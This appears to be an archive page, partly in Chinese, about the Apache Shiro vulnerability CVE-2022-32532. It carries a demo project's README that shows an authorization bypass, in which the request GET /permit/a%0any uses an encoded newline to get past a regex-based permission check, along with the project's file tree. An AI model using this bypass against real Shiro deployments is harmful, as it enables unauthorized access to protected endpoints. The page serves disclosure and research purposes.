关联漏洞
标题:
Apache Shiro 安全漏洞
(CVE-2022-32532)
描述:Apache Shiro是美国阿帕奇(Apache)基金会的一套用于执行认证、授权、加密和会话管理的Java安全框架。 Apache Shiro 1.9.1之前版本存在安全漏洞,该漏洞源于RegexRequestMatcher被错误配置在某些servlet容器上。
描述
Apache Shiro CVE-2022-32532
介绍
# CVE-2022-32532
## about
This is a demo project, which only shows one of the conditions for exploiting this vulnerability (CVE-2022-32532).
In fact, there are more ways to exploit it, as long as developers use `RegExPatternMatcher`, there will be a possible bypass vulnerability.
## introduce
Token request header verification is required under the current configuration, otherwise you do not have permission to access the interface under `/permit`
This request can succeed
```http request
GET /permit/any HTTP/1.1
Token: 4ra1n
```
Access is not allowed when there is no token request header
```http request
GET /permit/any HTTP/1.1
```
It can be bypassed in a simple way in special but common configurations
```http request
GET /permit/a%0any HTTP/1.1
```
## reference
https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
文件快照
[4.0K] /data/pocs/db23da9a85e44e962b682b8bbf2f9dbd66066b0b
├── [1.3K] pom.xml
├── [1.1K] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] example
│ └── [4.0K] shirodemo
│ ├── [ 608] DemoController.java
│ ├── [1.1K] MyFilter.java
│ ├── [1.5K] MyShiroFilterFactoryBean.java
│ ├── [ 702] ShiroConfig.java
│ └── [ 332] ShiroDemoApplication.java
└── [4.0K] resources
└── [ 0] application.properties
7 directories, 8 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。